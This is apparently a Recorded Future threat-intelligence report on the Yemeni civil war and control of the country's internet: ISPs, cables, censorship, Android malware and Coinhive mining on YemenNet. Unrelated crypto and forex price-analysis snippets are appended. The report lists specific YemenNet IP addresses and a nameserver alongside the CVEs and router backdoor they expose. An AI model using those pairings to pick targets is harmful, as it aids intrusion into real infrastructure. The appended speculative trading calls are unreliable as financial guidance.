  • Since taking Yemen’s capital, Sana’a, in September 2014, the Houthi rebels have supervised the main ISP YemenNet, as well as the same access controls and censorship tools previously used to disrupt, degrade, or monitor internet activity for the last three years.
  • Recorded Future assesses with medium confidence that the Houthi rebels within Sana’a are taking advantage of YemenNet’s vast IP infrastructure to host Coinhive mining services to generate revenue.
  • While official government sites hosted on YemenNet and the .ye domain space have been changed to reflect the Houthi government in Sana’a, rather than the Hadi government in Aden, Recorded Future has noted some vulnerabilities within YemenNet’s main name server and multiple servers that, until recently, hosted over 500 official .ye domains.
  • The Hadi government, now in Aden instead of Sana’a, produced a new ISP, AdenNet, in June 2018. We believe this could lead to new internet resiliency within the country as internet subscriptions and mobile subscriptions continue to rise.
  • A small percentage of internet users in Yemen are using either VPNs, Tor, or routers with DNS recursion to circumvent government controls.
  • Suspicious internet-related activity out of Yemen suggests low levels of adware and spyware, but information as to the actors behind it is inconclusive.
  • Major international players, including the United States, Russia, and China, are using malware, military activity, political leverage, and investments to further their interests in the Saudi-Iranian regional conflict for hegemony within Yemen.

Infographic

Graphical representation of this analysis.

Background

Yemen has been embroiled in an ongoing civil war since 2015. The conflict is fueled by sectarian, religious, and political divides, as Yemen is relatively multicultural compared to the rest of the Arabian Peninsula. The Yemenis have endured multiple civil wars, including a conflict in Northern Yemen from 1962 to 1970, and a bloody war in 1994 after resisting the country’s 1990 unification. For all of its internal struggles, Ali Abdullah Saleh, a former president of Yemen, described governing the country as akin to “dancing on the heads of snakes.”

The current civil war traces back to a series of bloody protests, spurred on by the Arab Spring, that caused President Ali Abdullah Saleh to resign from power in 2011. This placed the vice president, Abdrabbuh Mansur Hadi, in power in a difficult situation, mandated to form a unified government in Yemen. Hadi ultimately failed to unify the country, leaving it largely ungoverned. The lack of control led to a power vacuum that allowed the growth of rebellious factions, competing foreign-backed governments, and the festering issue of extremism.

The Zaidi Shia Houthis are largely considered to be the rebellious faction, and are backed and supplied by the Iranian regime. The faction was formed from members of Yemen’s military previously loyal to Saleh before he turned on his own faction and was subsequently killed in 2017. The faction fights the Saudi-backed Abdrabbuh Mansur Hadi government, which currently claims political control of Yemen and is the internationally recognized government of Yemen. This fuels sectarian tensions, as the Hadi government supporters are largely Sunni Muslims, as opposed the Houthis, who are majority Shia. The United Arab Emirates funds a third group of southern separatists — a splinter group of the Southern Movement that has been actively trying to secede from Yemen since 2007. The group hopes to reestablish the borders from 1990, when the previously separate North Yemen and South Yemen were united to form one country. The Southern Movement is also predominantly Shia. These groups largely represent the different demographics within Yemen’s borders.

Additionally, remnants of Al-Qaeda in the Arabian Peninsula (AQAP) continue to hold large pockets of territory in the center of the country. AQAP is one of Al-Qaeda’s most prominent affiliates, taking credit for lone wolf attacks on Fort Hood, Little Rock, the USS Cole, and the failed airplane bombing in Detroit, as well as a jailbreak in Yemen. The group attempted a rebranding in 2011 as Ansar al-Sharia and began to focus on holding territory in Yemen. The group has predominantly operated as a militia and terror organization targeting Houthi installations in recent years. A similar affiliate model was attempted by the Islamic State, which largely failed to gain traction. The recent reporting of the Islamic State within Yemen surrounds skirmishes between AQAP and IS.

Yemen, as a battlefield, is an interesting microcosm of regional and global powers attempting to project their power and manifest their interests. The Yemeni civil war lies at the center of the Iranian and Saudi proxy battle for regional hegemony. Houthi-held territory has been targeted by Saudi Arabia’s Operation Decisive Storm, an airstrike campaign which the United Nations claims continues to kill non-combatants. The Iranian campaign, according to the U.S. military, has introduced weapons that have allowed the Houthis to interdict shipping routes in the Bab al-Mandeb strait. As tensions rise between the United States and Iran, Iran has the ability to control the Strait of Hormuz across the peninsula and has threatened a blockade if it perceives the United States has been too aggressive. Recorded Future has reported on Iran and Saudi Arabia’s cyber conflict within Yemen previously in 2015, when the Yemen Cyber Army emerged as a patriotic hacking group attacking Saudi government agencies. The group has since been linked to Iran.

This regional conflict coincides with conflicting Russian and American interests in the Arabian Peninsula and the region’s sea lanes. The United States has also led an active campaign to rid the region of the presence of the Islamic State (IS) and Al-Qaeda, finding success against IS but at the expense of civilian deaths in airstrikes and costly special operation campaigns. Conversely, the Jamestown Foundation has speculated that Russia has deployed private military contractors to Yemen to oversee a political solution to the war. The Carnegie Endowment believes that Russia is involved with the goal of expanding its influence and projecting power in the Red Sea.

China has also increased its interest in the stability of the peninsula and has aligned itself with the Hadi government and its Saudi-backed forces since approximately 2017. While China and the Saudi Arabian government have pre-existing defense ties, a resolution to the conflict in Yemen would help reduce the risk to Chinese shipping around the Bab al-Mandeb strait and the surrounding area. The strait is a key transit route for China’s Belt and Road Initiative — a massive series of infrastructure projects designed to project Chinese national power — into Saudi Arabia and the wider Middle Eastern region.

Infrastructure

The internet infrastructure in Yemen is reflective of the international powers at play in the nation. The ongoing conflict has stunted the assignment of internet space, as well as the ability of citizens to access the internet. Rapid7’s National Exposure Index found that although Yemeni ASNs have allocated 135,168 IP addresses, only 17,934 addresses were assigned, indicating low usage. According to DomainTools, there have only been 1152 .ye domains registered (.ye is controlled by YemenNet). People self-reporting as being from Yemen have registered 7,845 domains, the most popular of which is .com. The fourth most popular TLD is .ye. Yemen ranks 50th globally in population, but 148th in domain registrations.

As territory has changed hands in Yemen for the last four years, so too has control over internet resources. As the Houthi forces seized the capital city of Sana’a, they also gained control over YemenNet — the major internet provider to Yemen. YemenNet is prone to outages and was previously disrupted by both cyber and physical means.

Submarine Cables

There are four submarine cables servicing Yemen at three landing points. As shown in the image below, the FALCON submarine cable has landing points at Al-Ghaydah and Al-Hudaydah, and SEA-ME-WE 5 also has a landing point at Al-Hudaydah, while AAE-1 and Aden-Djibouti have landing points at Aden.

Under Houthi control, TeleYemen (and therefore YemenNet) makes use of the submarine cables for routing traffic, most likely to avoid routing through the fiber-optic connections provided by Saudi Telecom. Currently, YemenNet peers with Reliance Globalcom, Cogent Communications, Omantel, and PCCW Global — all partners in the Asia Africa Europe-1 (AAE-1) submarine cable, which has a landing point in Aden. AdenNet, on the other hand, primarily makes use of the overland fiber-optic cables provided by Saudi Telecom.

Two of the three submarine landing points in Yemen are currently under the control of the Hadi government. The third, in Al-Hudaydah, is currently under the control of the Houthi rebels, but as shown in the image below, is an area that the Hadi government has been aggressively targeting. The port in Al-Hudaydah is critical for the delivery of food and medical supplies to a nation that is experiencing famine and a cholera outbreak. If the Hadi government forces take control of the port, they could cut off internet access between the outside world and YemenNet subscribers. While not as critical as the humanitarian crisis currently impacting Yemen, lack of internet access would make it more challenging to understand what is happening within the country.

Access and Censorship

In 2015, the Citizen Lab reported that the Yemeni government was censoring content for Yemeni citizens on YemenNet, its only national ISP with control over the .ye namespace. Much of the IP and domain space used in YemenNet is filtered through two caching servers, cache0.yemen.net[.]ye and cache1.yemen.net[.]ye. This may allow for content monitoring or interdiction of traffic. Recorded Future found remnants of that effort via Shodan, with a single NetSweeper device, a tool for web content filtering, installed on the IP 82.114.160.98. The IP used a self-signed SSL certificate, but Recorded Future could not identify any traffic going to or from that IP address. No other similar censorship or access control devices were found via Shodan or Censys.

Geographic Breakdown

Geographic breakdown of internet access and territory control. Source: Created from Al Jazeera, Reuters, World Energy Atlas, and Critical Threats (November 2018).

After taking over Yemen’s capital Sana’a in September 2014, the Houthi rebels gained control over YemenNet, TeleYemen, and all other telecom providers based within the city. In June 2018, they also seized control of the dominant mobile provider, MTN Yemen. Thus, the Houthi rebels now have access to the same access control and censorship tools previously used to disrupt or monitor internet activity, which may come online or offline depending on the physical safety of operators using the boxes. The Houthis have used these to block access to WhatsApp, Facebook, Twitter, and Telegram, according to reports from Al Arabiya, along with domains that reported on Houthi troop movements. It is likely that they used these controls to do so.

Recorded Future Timeline

Timeline of Yemeni internet activity and prominent airstrike operations.

The Houthis have also taken steps to shut off internet access entirely across their ISP control. On December 7, 2017, the Houthi-controlled Ministry of Communications and Information Technology initiated a shutdown of the internet for 30 minutes. Previously, the Houthis have disabled internet access to the port city of Aden. Numerous reports found that the Houthis severed over 80 percent of fiber optics lines from YemenNet, taking a more brutish approach to control information across the country.

Internet Service Provider IP Holdings

Major internet service provider IP holdings.

Forced to flee the capital, the Hadi government established a base of operations in Aden. The new base also required internet access, and rather than seed secrets or money to the Houthi-controlled YemenNet or be at the mercy of the Houthi government repeatedly cutting off access, the Hadi regime stood up AdenNet, a new backbone provider, in June 2018. The new ISP was funded by the United Arab Emirates (UAE), uses a single flow from Saudi Telecom (AS39386), and was built using routers from Chinese technology firm Huawei. Huawei is a corporation with extremely close ties to the Chinese government and military and has been banned from government use in the United States and Australia due to espionage concerns.

Much of AdenNet’s infrastructure is located outside of Yemen. The AdenNet website www.adennet4g[.]net was registered through GoDaddy on June 20, 2018, and is hosted at Bluehost, as is the AdenNet mail server (mail.adennet4g.net). Both hosts have the same IP address, 162.241.226.169, which according to Recorded Future research is shared by 886 other domains. Customer service functions, such as the self-service portal ssp.adennet4g[.]net, do make use of assigned AdenNet IP space.

The use of the .net gTLD for AdenNet and outside infrastructure may reflect the reluctance of the Hadi regime to use Houthi-controlled resources. It could also be indicative of the challenges that come with trying to build out new internet infrastructure, especially in the middle of a war zone. Earlier reports suggested that President Hadi is attempting to regain control of the .ye ccTLD, as well as the AS30873 and AS12486 ASNs. A review of documents at ICANN, IANA, and RIPE indicate that, as of this report, no formal process has been started. In addition, the likelihood of control of these resources being transferred by internet-governing bodies in the middle of a civil war is very low.

Baselining Internet Activity

Airstrikes and food shortages during the Yemeni civil war have left 18 million people in need of humanitarian assistance and have created a food emergency. However, internet activity from the country has not decreased during the war. According to the CIA World Factbook, internet users have risen from 19.1 percent of the population before the war in 2014 to 24.6 percent in 2016. Internet World Stats also claims that internet users have stayed roughly the same over the past two years, hovering at 24.3 percent in 2018. Additionally, multiple sources claim that cell phone penetration has been above 50 percent since before the country’s civil war and has either stayed roughly the same or grown over the last four years.

There is evidence of five different forms of users utilizing internet services within Yemen. The Houthi rebels used their control of YemenNet and the .ye domain space after taking Sana’a, and government websites reflect the current Houthi government within the capital. For example, the website of Yemen’s Ministry of Foreign Affairs contains an up-to-date list on the current Houthi-led ministry. Additionally, with the creation of AdenNet, the Hadi government will likely be using internet services more frequently.

Ministry of Foreign Affairs Website

Screenshot of Yemen’s Houthi-led Ministry of Foreign Affairs website under the domain mofa.gov[.]ye.

Universities also still have access to the internet within the country, and university students are still using internet services to conduct research, communicate with each other, and browse the web. However, this is becoming an increasingly smaller source of traffic as universities are gradually being targeted in airstrikes and bombing attacks by both Houthi and Hadi-led factions, causing university enrollment to decrease. Additionally, universities in the country are increasingly being repurposed as detention centers, which is likely another reason for a drop in university internet usage.

A disproportionately large number of home and business users in Yemen have enabled DNS recursion on their routers, which allows these routers to act as a caching DNS server for the users behind the router. According to Shodan, there are more than 12,000 customer premise equipment (CPE) routers with DNS recursion enabled. It is possible that this is being done to bypass the reported draconian censorship enforced by the Houthis — as mentioned earlier, they are reportedly using Netsweeper, a tool that uses a combination of web and DNS filtering, to block content deemed objectionable.

For comparison, the countries of Mozambique and Ghana, which have similar population sizes to Yemen, only report around 670 and 1200 open DNS servers in Shodan, respectively.

Yemeni Traffic Destinations

Breakdown of Yemeni traffic destinations to OpenVPN endpoints, according to third-party metadata.

Finally, multiple sources have suggested that Yemeni citizens have used either Tor Browser or VPNs to get around Yemeni internet shutdowns and censorship. This user group would likely be accessing sources that are not sanctioned by either the Houthi-led rebels (who temporarily shut down the internet across the entire country on December 7, 2017) or the Hadi government, which has a history of blocking various social media outlets. Recorded Future found evidence of VPN and Tor usage from Yemen during October 2018. Small amounts of traffic from multiple AdenNet IPs were attempting to access non-Yemeni IPs that had open ports 9001 (Tor), 1194 (OpenVPN), or 110 (IPSEC VPN tunneling).

Yemeni Traffic Destinations

Breakdown of Yemeni traffic destinations to Tor endpoints, according to third-party metadata.

Quantifying Internet Use in Hadi-Controlled Yemen

AdenNet is much smaller than the now Houthi-controlled YemenNet. To assess the types of traffic that were coming from the ISP, Recorded Future conducted metadata analysis from October 1, 2018, to November 6, 2018. Recorded Future chose to monitor AdenNet because of its recent creation, and because it is under the control of the Hadi government, making the analysis of this ISP useful to gain insight into what is occurring in Hadi-controlled Yemen. Although most major cities within Yemen have been hit by bombings since the creation of AdenNet in June 2018, both YemenNet and AdenNet seem to be functioning without much issue, based on traffic between the two ISPs and the publicly known YemenNet hosts online.

Recorded Future Map

Recorded Future map of airstrikes or bombings in Yemen since June 2018.

Top Ports and Protocols: Web Browsing and VPNs

Most of the activity we observed during our analysis of the Yemeni internet, somewhat unsurprisingly, was web browsing activity over HTTP or HTTPS. In addition, we also identified sporadic DNS, POP3, SMTP, and IMAP activity. We observed some IPSEC tunneling activity utilizing the Encapsulating Security Payload (ESP) protocol, which is indicative of VPN application use. This could be further evidence of Yemeni users attempting to circumvent either government’s internet controls in order to get online. Other activity included the use of internet administrative protocols TELNET, SSH, and the network news transfer protocol (NNTP), one of the internet’s oldest protocols, allowing for news article transfer between servers of the internet USENET newsgroup world. Finally, evidence of BitTorrent and online gaming activity as well as the possible use of XMPP messaging applications such as Jabber were also found.

Because most of the traffic we observed was web browsing activity, it is no surprise that most traffic originating from AdenNet IPs within the Recorded Future dataset were headed toward large hosting sites and content distribution network (CDN) providers like Highwinds, Amazon, and Akamai. What is surprising is the distribution between Western and Chinese-owned hosts. Alibaba and Tencent hosting services, while not as frequently accessed as their western counterparts, still show up as a sizable percentage of Yemeni internet traffic.

Suspicious Internet Activity

Internet Infrastructure Vulnerabilities

Recorded Future has found multiple instances of suspicious activity within and originating from Yemen’s internet infrastructure. For one, AdenNet does not seem to be the first time that Yemen has entrusted a Chinese company with its backbone internet infrastructure. Recorded Future’s Shodan integration shows that the IP for one of the main nameservers in YemenNet, ns1.yemen.net[.]ye, contains a “tenda-backdoor” module. While this module is no longer searchable in Shodan, the tenda-backdoor module refers to a firmware backdoor using vulnerability CVE-2017-16923 to conduct remote command execution in router models made by Chinese network manufacturer Tenda.

It is uncertain whether or not this was an intentional vendor backdoor or an accidental one. If the name server is connected to other infrastructure within YemenNet, which it is likely to be, both state and non-state attackers could leverage this backdoor to infiltrate the ISP.

Recorded Future Shodan Extension

Screenshot of the Recorded Future Shodan extension for ns1.yemen.net[.]ye.

Additionally, Houthi-controlled servers 82.114.162.66 and 82.114.162.10 that, up until June 2018, hosted upwards of 500 Yemeni government, educational, and corporate websites, are riddled with old vulnerabilities like CVE-2003-1582, CVE-2009-2521, CVE-2008-1446, and other older issues that, if left unpatched, could allow attackers easy access into said systems. Even though many of the original websites are no longer hosted on these servers, it is entirely possible that old system logs and data remain.

PassiveTotal Domain Results

Screenshot of PassiveTotal domain results for the IP 82.114.162[.]66 on given days in 2018. Source: PassiveTotal.

Command and Control Servers

Recorded Future’s collections, in conjunction with Shodan, identified a number of basic command and control servers exposed in Yemeni ranges running remote access trojans. These included the Bozok, DarkComet, and NetBus trojans.

Malware Samples

Recorded Future noted a significant increase in the number of malicious samples submitted to VirusTotal, from 13 samples from between 2015 and 2017 to a total of 164 samples in 2018. The cause remains unclear. This may be due to the introduction of AdenNet, as internet access becomes more consistently available to more citizens and residents of Yemen; however, it may also be due to increased threat activity.

Of these samples, approximately half were malicious, and the overwhelming majority of those malicious samples were Android applications. From the 84 Android samples uploaded to VirusTotal since 2015, Recorded Future was able to use Joe Sandbox to identify variants of widely disseminated malware families, including AhMyth, DroidJack, Hiddad, and Dianjin, as well as multiple fake Altcoin wallets, fake Whatsapp applications, and spyware posing as antivirus, video playing, and VPN applications. In addition, Recorded Future used Joe Sandbox dynamic analysis and Recorded Future malware detonation to determine that 50 percent of the adware obtained from the Android samples reached out to both Chinese and Western advertisement sites. Two-thirds of the fake antivirus spyware apps, as well as some AhMyth samples found, connected to Chinese IPs.

Most applications within the VirusTotal dataset appear to be low-level fake applications serving adware. However, some spyware from the dataset has been packed with JiaGuBao, a commercial packer from China. Additionally, the fake antivirus spyware reaching out to Chinese IPs accesses information from Android phones including old emails, SMS and call logs, and browser history. It likely uses accessibility services to control other installed applications and has the capability to change Wi-Fi configuration, start services while the phone screen is off, take photos, and delete other packages. There is no doubt that China is interested in the outcome of the civil war in Yemen both from a commercial and diplomatic perspective. However, while some of the malware reaching out to Chinese IPs align with possible Chinese surveillance interests, Recorded Future was unable to determine whether any malware obtained was from a Chinese nation-state espionage campaign. In addition, Recorded Future uncovered several Chinese mobile apps that requested extensive Android phone permissions being used by individuals in Yemen. Because these applications are currently only available on Chinese app stores, it is unlikely that the apps were being used by native Yemenis, but rather, Yemen-based Chinese nationals likely stationed in Yemen for capacity building purposes. Chinese companies, including Huawei, have sent Chinese workers to foreign countries in the past when constructing infrastructure projects. Chinese nationals would likely download applications tailored to them while in Yemen.

Coin Mining Activity

Finally, Recorded Future found 973 hosts within Yemen running cryptocurrency mining service Coinhive. Coinhive, a JavaScript-based Monero miner, was released in early 2017, two years after the Houthi rebels took control of YemenNet. It is usually embedded into websites and utilizes a user’s CPU or processing power to mine cryptocurrency for the benefit of the website’s owner. This will often lock a user’s browser and drain the user’s device battery for as long as the user is browsing the site. All 973 hosts belong to the YemenNet ASN AS30873, and 213 of the hosts share the same domain, dynamic.yemennet[.]ye.

Of the 974 hosts, all of them are MikroTik routers under the same ISP, and a majority of them (379) are located in Sana’a, the Houthi-held capital. Additionally, “unique” site keys generated by Coinhive admin accounts have been reused for multiple hosts, suggesting that a few accounts control a large majority of these hosts. Because of current Houthi government control over the ASN and .ye domain space, the relatively new coin mining technology, and the utilization of a few Coinhive accounts on multiple hosts, Recorded Future assesses with medium confidence that the Houthi-led government is attempting to use Coinhive to generate alt-currency for the regime. Additional sources of revenue during a time of famine and economic crisis would bolster Houthi-led efforts to legitimize themselves domestically by providing aid to Houthi regions where famine is harshest and purchasing additional conventional weapons to use against the Hadi-led government. Recorded Future was unable to determine how much Monero has been generated from these efforts.

Expected Cyber Targeting Profiles

Recorded Future expected certain targeting profiles for each of the major belligerents in the Yemen conflict. This section will explore that expected activity, along with any differences or lack of data affecting those parties.

Houthi Supreme Political Council

The fact that the Houthis control a vast amount of internet resources in Yemen, are supported by Iran, and exert de facto control over the country continues to antagonize the Saudi Arabian government. This likely makes them the target of Saudi Arabian surveillance. Recorded Future expects this surveillance would be primarily used to identify Houthi intent and battle plans for skirmishes across Yemen, and would target routers, traditional hosts, and Android mobile devices. The Citizen Lab tied the Saudi’s use of the NSO Group’s Pegasus espionage tools to target iOS devices, showing the Kingdom’s relative intent to outsource the development of their malware.

Lookout found that the NSO Group’s spyware for Android devices, Chrysaor, uses Message Queue Telemetry Transport (MQTT) for communications. The protocol uses TCP/IP port 1883 and port 8883 when traffic is encrypted over SSL. This protocol is also used by the common MeetMe social media platform and is commonly used for connections in remote locations that do not always have uptime. Despite Houthi control of YemenNet, Recorded Future could not identify any infections using the conventional Chrysaor configuration in YemenNet or in any of its collections.

Hadi Government

The Hadi government is directly supported by Saudi Arabia, attempting to bolster Sunni and Saudi influence in their neighboring country, and are direct combatants with the Iranian-backed Houthi forces. Recorded Future would anticipate, due to the Hadi government’s cooperation with China, that there would be some Chinese monitoring of Yemeni activity, even just as a manner of monitoring their investment. Additionally, Recorded Future would expect Iranian mobile surveillance malware deployed against these forces, which CheckPoint found to be used against Iranian dissident civilians and potential Islamic State sympathizers.

Southern Secessionists

The Southern Movement, formally known as the Southern Transitional Council (STC), is largely backed by the United Arab Emirates, but has found itself in an uneasy alignment with the Saudi coalition, which has often been tested and broken. In October 2018, the STC forces called for an uprising in Aden, directly conflicting with the Hadi government’s control of the city. The activity provoked further UN calls for peace, allowing the group to gain more international recognition for their goal of an autonomous South Yemen. Due to the UAE and Saudi governments’ cooperation and general alliance, Recorded Future does not anticipate Saudi targeting of the STC forces. Similarly, although the STC is in direct conflict with the Houthis, due to their lack of continued internet holdings or defined cell ranges, Recorded Future does not anticipate any particular targeting by Iranian malware against the STC.

Al-Qaeda in the Arabian Peninsula

Al-Qaeda’s affiliate in Yemen is surprisingly in a peculiar targeting scenario. The group largely has the backing of the Saudi-led coalition, according to the Carnegie Endowment, sharing a common goal of fighting the Houthis. The Saudis even signed a nonaggression pact with the extremists. This conflicts with the U.S. backing of Saudi Arabian interests, as the United States is largely targeting AQAP forces almost exclusively in Yemen. The Iranians likely oppose the targeting of Houthi forces by the Saudi-aligned extremists.

Kaspersky found the Slingshot framework targeting individual routers in Yemen and other nations from 2012 to 2018. Slingshot was said to be used by the United States military to target Islamic State and Al-Qaeda members, perhaps in the most publicized instance of cyber being used for terrorist monitoring. Recorded Future could not identify any of this activity.

Outlook

Despite the continued airstrike activity, armed skirmishes among Yemeni factions, and general degradation of Yemen’s infrastructure and public health, internet access in Yemen may prove to be resilient. The introduction of AdenNet to create a dual backbone in Yemen has created an additional network access point to thousands of citizens who had their internet access revoked when the Houthis seized Sana’a. However, vulnerabilities within YemenNet may lead to espionage or even destructive campaigns within its infrastructure, damaging internet access within Houthi-controlled territory.

Recorded Future assesses with medium confidence that, as inflation grows more rampant within the country, the Houthi government in Sana’a will continue its attempt to generate alternate forms of currency to bolster their aid and military efforts. Malware within the country will continue to be a constant factor, especially with new forms of access to the internet. Similarly, some Yemeni citizens will likely continue to circumvent government internet controls, understanding both governments’ desire to control internet access in the past. Unfortunately, access to information or cyber means will likely not help bring Yemen back from the brink of famine, a Cholera outbreak, or the atrocities of continued civil war.

The post Underlying Dimensions of Yemen’s Civil War: Control of the Internet appeared first on Recorded Future.

     

Crypto Update: Weakening Bearish Momentum Leads to Another Rally Attempt

The cryptocurrency segment is having its most bullish day in a long while, as despite the failed rally attempt on Monday, the top coins held up above their lows and launched another bounce. While that didn’t change the overwhelmingly bearish overall picture, it confirmed the weakening of the negative momentum, at least in the case […]

The post Crypto Update: Weakening Bearish Momentum Leads to Another Rally Attempt appeared first on Hacked: Hacking Finance.

Forex Analysis And Chartbook: Dollar Ticks Higher as Trade Worries Intensify

Tuesday Market Snapshot Asset Current Value Daily Change S&P 500 2,677 0.60% DAX 30 11,309 -0.40% WTI Crude Oil 51.39 -0.41% GOLD 1,212 -0.79% Bitcoin 3,717 -0.27% EUR/USD 1.1296 -0.28% Risk assets had a mixed day following yesterday’s rally attempt, as Asian and European markets struggled to extend yesterday’s move, with pronounced weakness in China, […]

The post Forex Analysis And Chartbook: Dollar Ticks Higher as Trade Worries Intensify appeared first on Hacked: Hacking Finance.

XRP Price Analysis: XRP/USD’s Punishing Pennant Set-up

  Bears will be looking to pile on the pressure below the $0.3500 area. The 4-hour chart view can see XRP/USD having formed another pennant pattern, subject to a potential break lower. XRP/USD over the last two sessions has stabilized somewhat but continues to nurse losses. The bulls sent out false hope on Sunday, after […]

The post XRP Price Analysis: XRP/USD’s Punishing Pennant Set-up appeared first on Hacked: Hacking Finance.

DHI: Let Us Trust the Technical Analysis

By Dmitriy Gurkovskiy, Chief Analyst at RoboMarkets With the market being a bit overheated, it needs a good correction, after which prices will become attractive for investors, who are taking profits on good company reports. The news overall is still positive, and in this situation, only inexperienced traders are ready to buy securities at maximum […]

The post DHI: Let Us Trust the Technical Analysis appeared first on Hacked: Hacking Finance.

Crypto Update: Bounce Fails Again as Bearish Forces Remain Dominant

While yesterday’s there was a chance for a short-term reversal in the cryptocurrency segment, due to the weakening bearish momentum and an encouraging bounce in some of the majors, the rally failed, and a lot of top coins hit new lows afterward. Our trend model remains on sell signals in most cases, and although the […]

The post Crypto Update: Bounce Fails Again as Bearish Forces Remain Dominant appeared first on Hacked: Hacking Finance.

Litecoin Price Analysis: LTC/USD a Buy Today, Tomorrow a Sell?

  The Litecoin price on Tuesday attempts at stabilization, but given the recent pattern, this could be sold again on Wednesday. LTC/USD weekly chart still looks worrying, and there could even be room for a complete market correction, sending the price as low as $4. The Litecoin price has been heavily dictated by the bears […]

The post Litecoin Price Analysis: LTC/USD a Buy Today, Tomorrow a Sell? appeared first on Hacked: Hacking Finance.

Forex Analysis And Chartbook: Stocks Attempt Rally as Italian Worries Ease

Monday Market Snapshot Asset Current Value Daily Change S&P 500 2,672 1.15% DAX 30 11,354 1.45% WTI Crude Oil 51.68 2.56% GOLD 1,222 -0.07% Bitcoin 3,723 -5.52% EUR/USD 1.1339 0.03% Risk assets staged a relief rally today before the US open, as Europe provided some minor positive catalysts, which, together with the good early Black […]

The post Forex Analysis And Chartbook: Stocks Attempt Rally as Italian Worries Ease appeared first on Hacked: Hacking Finance.

Tron Price Analysis: TRX/USD is Forming a Bottom Area, Readying a Recovery

  TRX/USD buyers are heavily defending the 1 cent price territory, as a bottom area gradually forms. Tron foundation continues to provide positive updates and Justin Sun once again takes aim at Ethereum. While selling pressure for TRX/USD is still somewhat intense, there are signs that a bottom area is forming. Buyers are doing their […]

The post Tron Price Analysis: TRX/USD is Forming a Bottom Area, Readying a Recovery appeared first on Hacked: Hacking Finance.

Rebound In Crude Prices May Reveal New Sales

By Dmitriy Gurkovskiy, Chief Analyst at RoboMarkets Last Friday, crude oil tested this year’s lows. On Monday, November 26th, there is a technical rebound underway in the commodity market, but it barely changes the global picture in terms of oil trading. Right now, the bears are obviously much stronger than the bulls. The second sale […]

The post Rebound In Crude Prices May Reveal New Sales appeared first on Hacked: Hacking Finance.

Crypto Update: Coins Bounce Back but Bear Trap Not Yet Confirmed

The cryptocurrency segment is finally showing early signs of strength following the weekend’s selloff that took most of the majors to new bear market lows. Compared to the steep declines of the past couple of weeks, the bearish momentum has been relatively weak, and some of the top coins managed to climb back to, or […]

The post Crypto Update: Coins Bounce Back but Bear Trap Not Yet Confirmed appeared first on Hacked: Hacking Finance.

Crypto Update: Another Steep Selloff Drags Majors to New Lows

The cryptocurrency segment got hit had yet again this weekend, as the mid-week bounce faded and the recent panic lows failed to hold up the top coins. The negative long-term market forces took hold of the segment again, and despite the deeply oversold momentum readings, the majors plunged to new lows. Bitcoin briefly violated the […]

The post Crypto Update: Another Steep Selloff Drags Majors to New Lows appeared first on Hacked: Hacking Finance.

Ethereum Price Analysis: ETH/USD Set for $100 Breach, What Next?

ETH/USD has dropped a chunky 55 percent since the 7th November. Bears continue to smash through key area of support. A daily closure below $109.80 (27th May 2017 low) could be devastating, in opening the door for a firm breach of the psychological $100 mark. Selling Pressure in the Highest Gear ETH/USD selling pressure intensity […]

The post Ethereum Price Analysis: ETH/USD Set for $100 Breach, What Next? appeared first on Hacked: Hacking Finance.

XRP Price Analysis: XRP/USD is One More Breach Away from $0.25

  XRP/USD remains very much vulnerable to another fall. Key levels to note: $0.4000, $0.3800 and then $0.3000-$0.2500. Price action has formed a consolidation block, which is subject to a breakout lower. Recent Price Developments XRP/USD remains firmly in the control of the market bears. The price running within its third consecutive daily session in […]

The post XRP Price Analysis: XRP/USD is One More Breach Away from $0.25 appeared first on Hacked: Hacking Finance.

Forex Analysis and Chartbook: Risk Assets Remain Under Pressure on Black Friday

Friday Market Snapshot Asset Current Value Daily Change S&P 500 2,645 0.47% DAX 30 11,192 0.49% WTI Crude Oil 51.18 -4.98% GOLD 1,223 -0.33% Bitcoin 4,246 -0.67% EUR/USD 1.1335 -0.57% While global stock markets are relatively stable today, the key indices are trading near their recent lows, with the broad risk-off shift still being clearly […]

The post Forex Analysis and Chartbook: Risk Assets Remain Under Pressure on Black Friday appeared first on Hacked: Hacking Finance.

Tron Price Analysis: If the Bulls Do Not Wake Up, Another 35% Drop May be Seen for TRX/USD

TRX/USD is subject to another deep fall given the current technical structure. News flow around Tron remains encouraging, following support from another exchange, Huobi. Social media space continues to get excited about Kobe Bryant being a key speaker at the Tron summit in 2019. TRX/USD over the past few weeks has been a victim of […]

The post Tron Price Analysis: If the Bulls Do Not Wake Up, Another 35% Drop May be Seen for TRX/USD appeared first on Hacked: Hacking Finance.

EOS Update: Bull and Bear Scenarios

EOS (EOS/BTC) recorded one of its major lows of 0.0006914 on August 14, 2018. Since then, the market has been trading within a wide range between 0.0006914 and 0.0009544 with a midpoint or range equilibrium at 0.0008058. Retail investors buying this range are most likely accumulating. They believe that this is the bottom and EOS […]

The post EOS Update: Bull and Bear Scenarios appeared first on Hacked: Hacking Finance.

Crypto Update: Majors Test Lows After Consolidation

After a brief quiet period in the cryptocurrency segment, the top coins turned lower again in the second half of the day and approached their recent bear market lows. While Bitcoin only tested its panic low, Ethereum dipped below at and the still relatively strong Ripple also fell below the key long-term support zone that […]

The post Crypto Update: Majors Test Lows After Consolidation appeared first on Hacked: Hacking Finance.

Crypto Update: Coins Consolidate on Thanksgiving Day After Wild Ride

Volatility declined substantially today in the cryptocurrency segment following three days of heavy trading, with top coins consolidation after the recent leg of the market-wide crash. US markets have been closed for Thanksgiving Day, and although traditional financial markets had an active day, especially in Europe, volumes in the crypto-segment were much lower than in […]

The post Crypto Update: Coins Consolidate on Thanksgiving Day After Wild Ride appeared first on Hacked: Hacking Finance.

Cardano Price Analysis: ADA/USDT Vulnerable to Another Hard Fall

Cardano’s Charles Hoskinson provided some insight on timing for the 1.4 update and more. ADA/USDT, given market conditions and technical price structure, is subject to another break lower.  Cardano’s ADA is in just as much trouble as every other cryptocurrency, given the strong and very stubborn bear market. There still appears to be room for […]

The post Cardano Price Analysis: ADA/USDT Vulnerable to Another Hard Fall appeared first on Hacked: Hacking Finance.

Ethereum Price Analysis: Calm Before Another Potential Storm

  ETH/USD price action is moving within consolidation mode, after being allowed some consolidation gains during the previous session. Major weekly support levels to note are seen at $130 (July 2017) and then $110 (May 2017). ETH/USD was provided a consolidation bounce during yesterday’s session. The price managed to close marginally in the green, after […]

The post Ethereum Price Analysis: Calm Before Another Potential Storm appeared first on Hacked: Hacking Finance.

Crypto Update: Ripple Due for a Correction

While Bitcoin (BTC/USD) and most altcoins have fallen in the height of the crypto carnages, Ripple (XRP/BTC) not only stood its ground but it even went against the trend. It managed to continue climbing while almost everything else was crumbling. Yesterday, November 20, 2018,  Ripple/Bitcoin was up by as much as 7.17% to as high […]

